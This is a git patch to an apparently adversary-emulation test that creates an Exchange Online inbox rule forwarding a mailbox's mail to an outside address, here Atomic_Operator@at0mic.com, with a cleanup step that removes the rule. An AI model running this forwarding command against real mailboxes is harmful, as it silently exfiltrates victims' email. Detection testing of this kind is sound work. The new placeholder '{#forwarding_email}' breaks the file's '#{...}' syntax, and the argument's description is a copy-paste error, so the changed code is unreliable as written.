From 52bf96f19784276fe0559c0404e91d65382e3bd2 Mon Sep 17 00:00:00 2001
From: Justin Schoenfeld <justin.schoenfeld@redcanary.com>
Date: Thu, 5 Jan 2023 09:43:34 -0500
Subject: [PATCH] Implement option email forwarding address

---
 atomics/T1114.003/T1114.003.yaml | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/atomics/T1114.003/T1114.003.yaml b/atomics/T1114.003/T1114.003.yaml
index e74f5cf4..73d188da 100644
--- a/atomics/T1114.003/T1114.003.yaml
+++ b/atomics/T1114.003/T1114.003.yaml
@@ -20,6 +20,10 @@ atomic_tests:
       description: email rule name
       type: String
       default: "Atomic Red Team Email Rule"
+    forwarding_email:
+      description: email rule name
+      type: String
+      default: "Atomic_Operator@at0mic.com"
   dependency_executor_name: powershell
   dependencies:
   - description: |
@@ -36,11 +40,11 @@ atomic_tests:
       $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
       Connect-ExchangeOnline -Credential $creds
-      New-InboxRule -Name "#{rule_name}" -ForwardTo 'Atomic_Operator@example.com'
+      New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
     cleanup_command: |
       $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
       Connect-ExchangeOnline -Credential $creds
       Get-InboxRule | Where-Object { $_.Name -eq "#{rule_name}" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
     name: powershell
-    elevation_required: false
\ No newline at end of file
+    elevation_required: false